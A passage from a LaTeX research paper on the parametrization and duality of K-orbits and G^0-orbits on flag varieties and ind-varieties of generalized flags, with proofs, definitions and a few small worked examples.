\label{proof-P3.6}
\dim \delta\left( F_{n-k}\right)\cap F_{n-\ell}=|\{j=1,\ldots,n-\ell:1\leq w_j\leq n-k\}|
\end{equation}
and
\begin{eqnarray}
\label{proof-P3.7}
\dim\delta \left(F_k\right)\cap F_\ell & = & |\{j=1,\ldots,\ell:1\leq w_j\leq k\}| \\
\nonumber & = & \ell-|\{j=1,\ldots,\ell:w_j\geq k+1\}| \\
\nonumber & = & \ell-(n-k-|\{j\geq \ell+1:w_j\geq k+1\}|) \\
\nonumber & = & \ell+k-n+|\{j=1,\ldots,n-\ell:w_0ww_0(j)\leq n-k\}|
\end{eqnarray}
for all $k,\ell\in\{1,\ldots,n\}$. Comparing (\ref{proof-P3.5})--(\ref{proof-P3.7}) we conclude that $w=w_0ww_0$.
Let $k\in\{1,\ldots,n\}$ be such that $w_k=k$. Since $ww_0=w_0w$, we have $w_{n-k+1}=n-k+1$.
Applying (\ref{proof-P3.4}) with $A=F_k$ (resp., $A=F_{k-1}$) and $B=V_+$, we get
\[1+\dim F_{k-1}\cap V_+-\dim F_k\cap V_+=\dim F_{n-k+1}\cap V_--\dim F_{n-k}\cap V_-\]
in types BD1 and C2 (where $V_+^\perp=V_-$), whence
\begin{eqnarray*}
\varepsilon_k=1 & \Leftrightarrow & \dim F_k\cap V_+=\dim F_{k-1}\cap V_++1 \\
& \Leftrightarrow & \dim F_{n-k+1}\cap V_-=\dim F_{n-k}\cap V_-\Leftrightarrow\varepsilon_{n-k+1}=1
\end{eqnarray*}
in that case. In types C1 and D3 (where $V_+^\perp=V_+$), we get
\[1+\dim F_{k-1}\cap V_+-\dim F_k\cap V_+=\dim F_{n-k+1}\cap V_+-\dim F_{n-k}\cap V_+\,,\]
whence also
\[\varepsilon_k=1\Leftrightarrow \varepsilon_{n-k+1}=-1\,.\]
At this point we obtain that the signed involution $(w,\varepsilon)$ satisfies conditions {\rm (i)}--{\rm (ii)} in Section \ref{S3.3}.
To conclude that $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$, it remains to check that in types C2 and D3 we have $w_k\not=n-k+1$ for all $k\leq\frac{n}{2}$. Arguing by contradiction, assume that $w_k=n-k+1$. Since $\mathcal{F}\in\mathcal{O}_{(w,\varepsilon)}$ there is a $(w,\varepsilon)$-conjugate basis $\underline{v}=(v_1,\ldots,v_n)$ such that $\mathcal{F}=\mathcal{F}(\underline{v})$.
Thus $\delta(v_k)=v_{n-k+1}$, so writing $v_k=v_k^++v_k^-$ with $v_k^\pm\in V_\pm$ we get $v_{n-k+1}=\delta(v_k)=v_k^+-v_k^-$.
In type C2 we have $V_+^\perp=V_-$ and $\omega$ is antisymmetric, hence
\[\omega(v_k^++v_k^-,v_k^+-v_k^-)=\omega(v_k^+,v_k^+)-\omega(v_k^-,v_k^-)=0-0=0.\]
In type D3 we have $V_+^\perp=V_+$, $V_-^\perp=V_-$, and $\omega$ is symmetric, hence
\[\omega(v_k^++v_k^-,v_k^+-v_k^-)=-\omega(v_k^+,v_k^-)+\omega(v_k^-,v_k^+)=0.\]
In both cases we deduce
\[F_{n-k+1}=F_{n-k}+\langle v_{n-k+1}\rangle_{\mathbb{C}}\subset F_k^\perp+F_{k-1}^\perp\cap\langle v_k\rangle_\mathbb{C}^\perp=F_k^\perp=F_{n-k},\]
a contradiction.
This completes the proof of Claim 1.
\medskip
\noindent
{\it Proof of Claim 2.}
For $k\in\{1,\ldots,n\}$ set $k^*=n-k+1$. We can write
\[w=(c_1;c'_1)\cdots(c_s;c'_s)(c'^*_1;c^*_1)\cdots(c'^*_s;c^*_s)(d_1;d^*_1)\cdots(d_t;d^*_t)\]
where $c_1<\ldots<c_s<c^*_s<\ldots<c^*_1$, $c_j<c'_j\not=c^*_j$ for all $j$, $d_1<\ldots<d_t<d^*_t<\ldots<d^*_1$. Note that $t=0$ in types C2 and D3.
Moreover, we denote
\begin{eqnarray*}
& \{a_1<\ldots<a_{p-t-2s}\}:=\{k:w_k=k,\ \varepsilon_k=1\},\\
& \{b_1<\ldots<b_{q-t-2s}\}:=\{k:w_k=k,\ \varepsilon_k=-1\}.
\end{eqnarray*}
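To fix the notation just introduced, here is a small example (added for illustration only; it assumes type BD1 or C1, where $t$ may be nonzero). Take $n=6$ and $p=q=3$, so that $k^*=7-k$, and consider

```latex
% Illustrative example (not part of the proof): n=6, p=q=3, k^*=7-k.
w=(1;2)\,(5;6)\,(3;4),\qquad s=t=1.
% Here c_1=1 and c_1'=2, hence c_1^*=6 and c_1'^*=5, and d_1=3, d_1^*=4.
% The involution w has no fixed points, so the sets {a_j} and {b_j} are
% empty, in agreement with p-t-2s = q-t-2s = 0. Since w_3 = 3^* = 4,
% this w can only occur in types BD1 and C1, consistently with the
% requirement t=0 in types C2 and D3.
```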
We can construct a $\phi$-orthonormal basis
\[x_1^+,\ldots,x_t^+,y^+_1,\ldots,y^+_s,y^{+*}_s,\ldots,y^{+*}_1,z^+_1,\ldots,z^+_{p-t-2s}\]
of $V_+$, and a $(-\phi)$-orthonormal basis
\[x_1^-,\ldots,x_t^-,y^-_1,\ldots,y^-_s,y^{-*}_s,\ldots,y^{-*}_1,z^-_1,\ldots,z^-_{q-t-2s}\]
of $V_-$,
such that in types BD1 and C2 (where the restriction of $\omega$ on $V_+$ and $V_-$ is nondegenerate) we have
\begin{eqnarray*}
& \omega(x^+_j,x^+_j)=\omega(x^-_j,x^-_j)=1,\\
& \omega(y^+_j,y^{+*}_j)=\omega(y^-_j,y^{-*}_j)=1,\quad\omega(y^{+*}_j,y^+_j)=\omega(y^{-*}_j,y^-_j)=\epsilon, \\
& \omega(z^+_j,z^+_{\ell})=\left\{\begin{array}{ll} 1 & \mbox{if $j\leq \ell=p-t-2s+1-j$,} \\ \epsilon & \mbox{if $j>\ell=p-t-2s+1-j$,} \end{array}\right.
\\
& \omega(z^-_j,z^-_{\ell})=\left\{\begin{array}{ll} 1 & \mbox{if $j\leq \ell=q-t-2s+1-j$,} \\ \epsilon & \mbox{if $j>\ell=q-t-2s+1-j$,} \end{array}\right.
\end{eqnarray*}
while all other values of $\omega$ on pairs of basis vectors equal $0$. In types C1 and D3 (where $V_+^\perp=V_+$, $V_-^\perp=V_-$, and in particular $p=q=\frac{n}{2}$) we require that
\begin{eqnarray*}
& \omega(x^+_j,x^-_j)=i,\quad \omega(x^-_j,x^+_j)=\epsilon i,\\
& \omega(y^+_j,y^{-*}_j)=\omega(y^-_j,y^{+*}_j)=1,\quad\omega(y^{+*}_j,y^-_j)=\omega(y^{-*}_j,y^+_j)=\epsilon, \\
& \omega(z^+_j,z^-_{\ell})=\epsilon\omega(z^-_\ell,z^+_j)=\left\{\begin{array}{ll} 1 & \mbox{if $\ell=\tilde{j}:=\frac{n}{2}-t-2s+1-j$ and $a_j<b_{\tilde{j}}$} \\ \epsilon & \mbox{if $\ell=\tilde{j}:=\frac{n}{2}-t-2s+1-j$ and $a_j>b_{\tilde{j}}$,} \end{array}\right.
\end{eqnarray*}
while the other values of $\omega$ on the basis are $0$.
In contrast to the values $\omega(z_j^\pm,z_\ell^\pm)$ in types BD1 and C2, the value $\omega(z_j^+,z_\ell^-)$ in types C1 and D3 is not subject to a constraint, but is chosen so that the basis $(v_1,\ldots,v_n)$ below satisfies (\ref{3.3.18}).
In all cases we construct a basis $(v_1,\ldots,v_n)$ by setting
\[v_{d_j}=\frac{x^+_j+ix^-_j}{\sqrt{2}},\quad v_{d_j^*}=\frac{x^+_j-ix^-_j}{\sqrt{2}},\]
\[v_{c_j}=\frac{y^+_j+y^-_j}{\sqrt{2}},\quad v_{c'_j}=\frac{y^+_j-y^-_j}{\sqrt{2}},\quad v_{c^*_j}=\frac{y^{+*}_j+y^{-*}_j}{\sqrt{2}},\quad v_{c'^*_j}=\frac{y^{+*}_j-y^{-*}_j}{\sqrt{2}},\]
\[v_{a_j}=z^+_j,\quad\mbox{and}\quad v_{b_j}=z_j^-.\]
It is straightforward to check that the basis $(v_1,\ldots,v_n)$ is both $(w,\varepsilon)$-dual and $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18}). This completes the proof of Claim 2.
\end{proof}
\section{Orbit duality in ind-varieties of generalized flags}
\label{S4}
Following the pattern of Section~\ref{S3}, we now present our results on orbit duality in the infinite-dimensional case. All proofs are given in Section~\ref{S4.proofs}.
\subsection{Types A1 and A2}
\label{S4.1}
The notation is as in Section \ref{S:A1A2}.
For every $\ell\in\mathbb{N}^*$ there is a unique $\ell^*\in\mathbb{N}^*$
such that $\omega(e_\ell,e_{\ell^*})\not=0$,
and this yields a bijection $\iota:\mathbb{N}^*\to\mathbb{N}^*$, $\ell\mapsto\ell^*$.
Let $\mathfrak{I}_\infty(\iota)$ be the set of involutions $w:\mathbb{N}^*\to\mathbb{N}^*$
such that $w(\ell)=\ell^*$ for all but finitely many $\ell\in\mathbb{N}^*$.
In particular we have $w\iota\in\mathfrak{S}_\infty$ for all $w\in\mathfrak{I}_\infty(\iota)$.
Let $\mathfrak{I}'_\infty(\iota)\subset \mathfrak{I}_\infty(\iota)$
be the subset of involutions without fixed points (i.e., such that $w(\ell)\not=\ell$ for all $\ell\in\mathbb{N}^*$).
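For orientation, consider the following hypothetical example (the specific form of $\iota$ is an assumption made only for this illustration): suppose $\omega$ pairs the basis vectors $e_{2\ell-1}$ and $e_{2\ell}$ for every $\ell$, so that $\iota$ swaps $2\ell-1$ and $2\ell$.

```latex
% Hypothetical illustration: assume iota(2l-1) = 2l for all l.
w(1)=1,\quad w(2)=2,\qquad w(\ell)=\iota(\ell)\ \mbox{ for all $\ell\geq 3$.}
% This w is an involution with w(l) = l^* for all but finitely many l,
% hence w lies in I_infty(iota); since w fixes 1 and 2, it belongs to
% I_infty(iota) \ I'_infty(iota), whereas iota itself (if it has no
% fixed points, as here) lies in I'_infty(iota).
```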
Let $\sigma:\mathbb{N}^*\to(A,\prec)$ be a bijection onto a totally ordered set,
and let us consider the ind-variety of generalized flags $\mathbf{X}(\mathcal{F}_\sigma,E)$.
In Proposition \ref{P4-1.1} below we show that the $\mathbf{K}$-orbits
and the $\mathbf{G}^0$-orbits of $\mathbf{X}(\mathcal{F}_\sigma,E)$ are parametrized by the elements of $\mathfrak{I}_\infty(\iota)$ in type A1, and by the elements of $\mathfrak{I}'_\infty(\iota)$ in type A2.
\begin{definition}
Let $w\in\mathfrak{I}_\infty(\iota)$.
Let $\underline{v}=(v_1,v_2,\ldots)$ be a basis of $\mathbf{V}$ such that
\begin{equation}
\label{4.1.1}
v_\ell=e_\ell\quad\mbox{for all but finitely many $\ell\in\mathbb{N}^*$}.
\end{equation}
We call $\underline{v}$ {\em $w$-dual} if in addition to (\ref{4.1.1}) $\underline{v}$ satisfies
\[\omega(v_\ell,v_k)=\left\{
\begin{array}{ll}
0 & \mbox{if $\ell\not=w_k$,} \\
\pm1 & \mbox{if $\ell=w_k$}
\end{array}
\quad\mbox{for all $k,\ell\in\mathbb{N}^*$,}
\right.\]
and we call $\underline{v}$ {\em $w$-conjugate} if in addition to (\ref{4.1.1})
\[\gamma(v_k)=\pm v_{w_k}\quad\mbox{for all $k\in\mathbb{N}^*$.}\]
Set
$\bs{\mathcal{O}}_w:=\{\mathcal{F}_{\sigma}(\underline{v}):\mbox{$\underline{v}$ is $w$-dual}\}$ and $\bs{\mathfrak{O}}_w:=\{\mathcal{F}_{\sigma}(\underline{v}):\mbox{$\underline{v}$ is $w$-conjugate}\}$, so that $\bs{\mathcal{O}}_w$ and $\bs{\mathfrak{O}}_w$ are subsets of the ind-variety $\mathbf{X}(\mathcal{F}_\sigma,E)$.
\end{definition}
\paragraph{\bf Notation.}
{\rm (a)}
We use the abbreviation $\mathbf{X}:=\mathbf{X}(\mathcal{F}_\sigma,E)$. \\
{\rm (b)}
If $\mathcal{F}$ is a generalized flag weakly compatible with $E$,
then $\mathcal{F}^\perp:=\{F^\perp:F\in\mathcal{F}\}$ is also a generalized flag weakly compatible with $E$.
Let $(A^*,\prec^*)$ be the totally ordered set given by $A^*=A$ as a set and $a\prec^*a'$ whenever $a\succ a'$.
Let $\sigma^\perp:\mathbb{N}^*\to(A^*,\prec^*)$ be defined by $\sigma^\perp(\ell)=\sigma(\ell^*)$.
Then we have
$\mathcal{F}_\sigma^\perp=\mathcal{F}_{\sigma^\perp}$.
Note that $\mathcal{F}^\perp$ is $E$-commensurable with $\mathcal{F}_{\sigma^\perp}$
whenever $\mathcal{F}$ is $E$-commensurable with $\mathcal{F}_\sigma$.
Hence the map
\[\mathbf{X}\to\mathbf{X}^\perp:=\mathbf{X}(\mathcal{F}_{\sigma^\perp},E),\ \mathcal{F}\mapsto\mathcal{F}^\perp\]
is well defined.
We also use the abbreviation $\pmb{\mathbb{O}}^\perp_w:=(\pmb{\mathbb{O}}_{\sigma^\perp,\sigma})_w$ for all $w\in\mathfrak{S}_\infty$. \\
{\rm (c)}
We further note that $\gamma(\mathcal{F}_\sigma)=\mathcal{F}_{\sigma\circ\iota}$
and that $\gamma(\mathcal{F})\in\mathbf{X}^\gamma:=\mathbf{X}(\mathcal{F}_{\sigma\circ\iota},E)$ whenever $\mathcal{F}\in\mathbf{X}$.
We also abbreviate $\pmb{\mathbb{O}}^\gamma_w:=(\pmb{\mathbb{O}}_{\sigma\circ\iota,\sigma})_w$ for all $w\in\mathfrak{S}_\infty$.
\medskip
Thus
$\displaystyle \mathbf{X}^\perp\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\perp_w$
and
$\displaystyle \mathbf{X}^\gamma\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\gamma_w$
(see Proposition \ref{P2-3.2}).
\begin{proposition}
\label{P4-1.1}
Let $\mathfrak{I}^\epsilon_\infty(\iota)=\mathfrak{I}_\infty(\iota)$ in type A1
and $\mathfrak{I}^\epsilon_\infty(\iota)=\mathfrak{I}'_\infty(\iota)$ in type A2.
\begin{itemize}
\item[\rm (a)] For every $w\in\mathfrak{I}^\epsilon_\infty(\iota)$, \[\bs{\mathcal{O}}_w\cap\bs{\mathfrak{O}}_w=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $w$-dual and $w$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)] For every $w\in\mathfrak{I}^\epsilon_\infty(\iota)$,
\[
\bs{\mathcal{O}}_w=\{\mathcal{F}\in\mathbf{X}:(\mathcal{F}^\perp,\mathcal{F})\in\pmb{\mathbb{O}}^\perp_{w\iota}\} \quad\mbox{and}\quad
\bs{\mathfrak{O}}_w=\{\mathcal{F}\in\mathbf{X}:(\gamma(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}^\gamma_{w\iota}\}.
\]
\item[\rm (c)] The subsets $\bs{\mathcal{O}}_w$ (for $w\in\mathfrak{I}^\epsilon_\infty(\iota)$) are exactly the $\mathbf{K}$-orbits of $\mathbf{X}$.
The subsets $\bs{\mathfrak{O}}_w$ (for $w\in\mathfrak{I}^\epsilon_\infty(\iota)$) are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}$.
Moreover $\bs{\mathcal{O}}_w\cap\bs{\mathfrak{O}}_w$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Type A3}
\label{S4.2}
The notation is as in Section \ref{S:A3}.
In particular, we fix a partition $\mathbb{N}^*=N_+\sqcup N_-$ yielding $\Phi$ as in (\ref{phi}) and we consider the corresponding
hermitian form $\phi$ and involution $\delta$ on $\mathbf{V}$.
Let $\mathfrak{I}_\infty(N_+,N_-)$ be the set of pairs $(w,\varepsilon)$ consisting of an involution $w:\mathbb{N}^*\to\mathbb{N}^*$ and a map $\varepsilon:\{\ell:w_\ell=\ell\}\to\{1,-1\}$ such that the subsets
\[N'_\pm=N'_\pm(w,\varepsilon):=\{\ell\in N_\pm:(w_\ell,\varepsilon_\ell)=(\ell,\pm1)\}
\]
satisfy
\[|N_\pm\setminus N'_\pm|=|\{\ell\in N_\mp:(w_\ell,\varepsilon_\ell)=(\ell,\pm 1)\}|+\frac{1}{2}|\{\ell\in\mathbb{N}^*:w_\ell\not=\ell\}|<\infty.\]
In particular, $w\in\mathfrak{S}_\infty$.
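The counting condition defining $\mathfrak{I}_\infty(N_+,N_-)$ can be checked on a small hypothetical example (the partition chosen here is an assumption for illustration): let $N_+$ consist of the odd and $N_-$ of the even positive integers, and set

```latex
% Hypothetical illustration: N_+ = odd integers, N_- = even integers.
w(1)=2,\quad w(2)=1,\qquad w(\ell)=\ell\ \mbox{ for $\ell\geq 3$,}\qquad
\varepsilon_\ell=\left\{\begin{array}{ll} +1 & \mbox{if $\ell\geq 3$ is odd,}\\ -1 & \mbox{if $\ell\geq 4$ is even.}\end{array}\right.
% Then N'_+ = {odd l >= 3} and N'_- = {even l >= 4}, so
% |N_+ \ N'_+| = |{1}| = 1 = 0 + (1/2)|{l : w_l != l}|,
% and similarly for N_-; hence (w,epsilon) lies in I_infty(N_+,N_-).
```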
Fix $\sigma:\mathbb{N}^*\to (A,\prec)$ a bijection onto a totally ordered set.
We show in Proposition \ref{P4.2-2} that the $\mathbf{K}$-orbits and the $\mathbf{G}^0$-orbits of the ind-variety $\mathbf{X}:=\mathbf{X}(\mathcal{F}_\sigma,E)$ are parametrized by the elements of $\mathfrak{I}_\infty(N_+,N_-)$.
\begin{definition}
Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$.
A basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$ such that $v_\ell=e_\ell$ for all but finitely many $\ell\in\mathbb{N}^*$ is {\em $(w,\varepsilon)$-conjugate} if
\[\delta(v_k)=\left\{
\begin{array}{ll}
v_{w_k} & \mbox{if $w_k\not=k$,} \\
\varepsilon_kv_k & \mbox{if $w_k=k$}
\end{array}
\right.
\quad\mbox{for all $k\in\mathbb{N}^*$,}\]
and is {\em $(w,\varepsilon)$-dual} if
\[
\phi(v_k,v_\ell)=\left\{
\begin{array}{ll}
0 & \mbox{if $\ell\not=w_k$,} \\
1 & \mbox{if $\ell=w_k\not=k$,} \\
\varepsilon_k & \mbox{if $\ell=w_k=k$}
\end{array}
\right.
\quad\mbox{for all $k,\ell\in\mathbb{N}^*$}.
\]
Set
$\bs{\mathcal{O}}_{(w,\varepsilon)}:=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate}\}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}:=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual}\}$.
\end{definition}
\paragraph{\bf Notation}
{\rm (a)} Note that every subspace in the generalized flag $\mathcal{F}_\sigma$ is $\delta$-stable, i.e., $\delta(\mathcal{F}_\sigma)=\mathcal{F}_\sigma$.
Hence the map $\mathbf{X}\to\mathbf{X}$, $\mathcal{F}\mapsto\delta(\mathcal{F})$, is well defined.
\\
{\rm (b)} Write $F^\dag=\{x\in\mathbf{V}:\phi(x,y)=0\ \forall y\in F\}$ and
$\mathcal{F}^\dag:=\{F^\dag:F\in \mathcal{F}\}$, which is a generalized flag weakly compatible with $E$ whenever $\mathcal{F}$ is so.
As in Section \ref{S4.1} we write $(A^*,\prec^*)$ for the totally ordered set
such that $A^*=A$ and $a\prec^*a'$ whenever $a\succ a'$.
It is readily seen that $\mathcal{F}_\sigma^\dag=\mathcal{F}_{\sigma^\dag}$
where $\sigma^\dag:\mathbb{N}^*\to(A^*,\prec^*)$ is such that $\sigma^\dag(\ell)=\sigma(\ell)$ for all $\ell\in\mathbb{N}^*$, and we get a well-defined map
\[\mathbf{X}\to\mathbf{X}^\dag:=\mathbf{X}(\mathcal{F}_{\sigma^\dag},E),\ \mathcal{F}\mapsto\mathcal{F}^\dag.\]
{\rm (c)}
We write $\pmb{\mathbb{O}}_w:=(\pmb{\mathbb{O}}_{\sigma,\sigma})_w$ and
$\pmb{\mathbb{O}}_w^\dag:=(\pmb{\mathbb{O}}_{\sigma^\dag,\sigma})_w$ so that
\[\mathbf{X}\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}_w
\quad\mbox{and}\quad
\mathbf{X}^\dag\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\dag_w
\]
(see Proposition \ref{P2-3.2}).
\begin{proposition}
\label{P4.2-2}
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$ we have
\[\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate and $(w,\varepsilon)$-dual}\}\not=\emptyset.\]
\item[\rm (b)] Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$
and $\mathcal{F}=\{F'_a,F''_a:a\in A\}\in\mathbf{X}$. Then
$\mathcal{F}\in\bs{\mathcal{O}}_{(w,\varepsilon)}$ (resp., $\mathcal{F}\in\bs{\mathfrak{O}}_{(w,\varepsilon)}$) if and only if
\[(\delta(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}_w\quad\mbox{(resp., $(\mathcal{F}^\dag,\mathcal{F})\in\pmb{\mathbb{O}}_w^\dag$)}\]
and
\[
\dim F''_{\sigma(\ell)}\cap \mathbf{V}_\pm/F'_{\sigma(\ell)}\cap \mathbf{V}_\pm
=
\left\{\begin{array}{ll}
1 & \mbox{if $\sigma(w_\ell)\prec\sigma(\ell)$ or $(w_\ell,\varepsilon_\ell)=(\ell,\pm1)$,} \\
0 & \mbox{otherwise}
\end{array}\right.
\]
where $\mathbf{V}_\pm=\langle e_\ell:\ell\in N_\pm\rangle_\mathbb{C}$
(resp., for $n\in\mathbb{N}^*$ large enough
\[
\varsigma(\phi:F''_{\sigma(\ell)}\cap V_n)=\varsigma(\phi:F'_{\sigma(\ell)}\cap V_n)+\left\{
\begin{array}{ll}
(1,1) & \mbox{if $\sigma(w_\ell)\prec\sigma(\ell)$,} \\
(1,0) & \mbox{if $(w_\ell,\varepsilon_\ell)=(\ell,1)$,} \\
(0,1) & \mbox{if $(w_\ell,\varepsilon_\ell)=(\ell,-1)$,} \\
(0,0) & \mbox{if $\sigma(w_\ell)\succ\sigma(\ell)$}
\end{array}
\right.
\]
where $V_n=\langle e_k:k\leq n\rangle_\mathbb{C}$
and
$\varsigma(\phi:F)$ stands for the signature of $\phi$ on $F/F\cap F^\dag$)
for all $\ell\in\mathbb{N}^*$.
\item[\rm (c)] The subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}$ ($(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$) are exactly the $\mathbf{K}$-orbits of $\mathbf{X}$. The subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}$ ($(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$) are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}$.
Moreover $\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Types B, C, D}
\label{S4.3}
Assume that $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$, determined by a matrix $\Omega$ as in (\ref{omega}).
Let $\iota:\mathbb{N}^*\to\mathbb{N}^*$, $\ell\mapsto\ell^*$
satisfy $\omega(e_\ell,e_{\ell^*})\not=0$ for all $\ell$.
Let $\mathbb{N}^*=N_+\sqcup N_-$ be a partition such that $N_+,N_-$ are either both $\iota$-stable or such that $\iota(N_+)=N_-$.
As before, let $\phi$ and $\delta$ be the hermitian form and the involution of $\mathbf{V}$
corresponding to this partition.
The following table summarizes the different cases.
\begin{center}
\begin{tabular}{|c|c|c|}
\cline{2-3}
\multicolumn{1}{c|}{ } & \begin{tabular}{c} $\omega$ symmetric \\ $\epsilon=1$ \end{tabular} & \begin{tabular}{c} $\omega$ symplectic \\ $\epsilon=-1$ \end{tabular} \\
\hline
\begin{tabular}{c} $\iota(N_\pm)\subset N_\pm$ \\ $\eta=1$ \end{tabular} & type BD1 & type C2 \\
\hline
\begin{tabular}{c} $\iota(N_\pm)=N_\mp$ \\ $\eta=-1$ \end{tabular} & type D3 & type C1 \\
\hline
\end{tabular}
\end{center}
Let $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)\subset
\mathfrak{I}_\infty(N_+,N_-)$ be the subset of pairs
$(w,\varepsilon)$ such that
\begin{itemize}
\item[\rm (i)] $\iota w=w\iota$ (hence the set $\{\ell:w_\ell=\ell\}$ is $\iota$-stable);
\item[\rm (ii)] $\varepsilon_{\iota(k)}=\eta\varepsilon_k$ for all $k\in\{\ell:w_\ell=\ell\}$;
\item[\rm (iii)] if $\eta\epsilon=-1$, then $w_k\not=\iota(k)$ for all $k\in\mathbb{N}^*$.
\end{itemize}
Let $\mathcal{F}_\sigma$ be an $\omega$-isotropic maximal generalized flag compatible with $E$.
Thus $\sigma:\mathbb{N}^*\to(A,\prec)$ is a bijection
onto a totally ordered set $(A,\prec)$ endowed with an (involutive) antiautomorphism of ordered sets
$\iota_A:(A,\prec)\to (A,\prec)$ such that $\sigma\iota=\iota_A\sigma$.
The following statement shows that the $\mathbf{K}$-orbits and the $\mathbf{G}^0$-orbits
of the ind-variety $\mathbf{X}_\omega:=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)$
are parametrized by the elements of the set $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$.
\begin{proposition}
\label{P4.3}
We consider bases $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$ such that
\begin{equation}
\label{4-3.1}
\omega(v_k,v_\ell)\not=0\quad\mbox{if and only if}\quad \ell=\iota(k).
\end{equation}
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)$ we have
\begin{eqnarray*}
& \bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}:=\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\mathbf{X}_\omega=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate and satisfies (\ref{4-3.1})}\}\not=\emptyset, \\
& \bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}:=\bs{\mathfrak{O}}_{(w,\varepsilon)}\cap\mathbf{X}_\omega=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and satisfies (\ref{4-3.1})}\}\not=\emptyset, \\
& \bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate, $(w,\varepsilon)$-dual and satisfies (\ref{4-3.1})}\}\not=\emptyset.
\end{eqnarray*}
\item[\rm (b)] The subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
($(w,\varepsilon)\in\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$)
are exactly the $\mathbf{K}$-orbits of $\mathbf{X}_\omega$.
The subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
($(w,\varepsilon)\in\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$)
are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}_\omega$.
Moreover $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Ind-variety structure}
\label{S4.4}
In this section we recall from \cite{Dimitrov-Penkov} the ind-variety structure on $\mathbf{X}$ and $\mathbf{X}_\omega$.
Recall that $E=(e_1,e_2,\ldots)$ is a (countable) basis of $\mathbf{V}$.
Fix an $E$-compatible maximal generalized flag $\mathcal{F}_\sigma$ corresponding
to a bijection $\sigma:\mathbb{N}^*\to(A,\prec)$ onto a totally ordered set, and let
$\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)$.
Let $V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ and
let $X_n$ denote the variety of complete flags of $V_n$ defined as in (\ref{2.2.X}).
There are natural inclusions
$V_n\subset V_{n+1}$
and
\begin{equation}
\label{4.4-1}
\mathrm{GL}(V_n)\cong\{g\in \mathrm{GL}(V_{n+1}):g(V_n)=V_n,\ g(e_{n+1})=e_{n+1}\}\subset \mathrm{GL}(V_{n+1}),
\end{equation}
and we obtain a $\mathrm{GL}(V_n)$-equivariant embedding
\[\iota_n=\iota_n(\sigma):X_n\to X_{n+1},\ (F_k)_{k=0}^n\mapsto (F'_k)_{k=0}^{n+1}\]
by letting
\[F'_k:=\left\{
\begin{array}{ll}
F_k & \mbox{if $a_k\prec\sigma(n+1)$} \\
F_{k-1}\oplus\langle e_{n+1}\rangle_\mathbb{C} & \mbox{if $a_k\succeq \sigma(n+1)$}
\end{array}
\right.\]
where $a_1\prec a_2\prec\ldots\prec a_{n+1}$ are the elements of the set $\{\sigma(\ell):1\leq \ell\leq n+1\}$ written in increasing order.
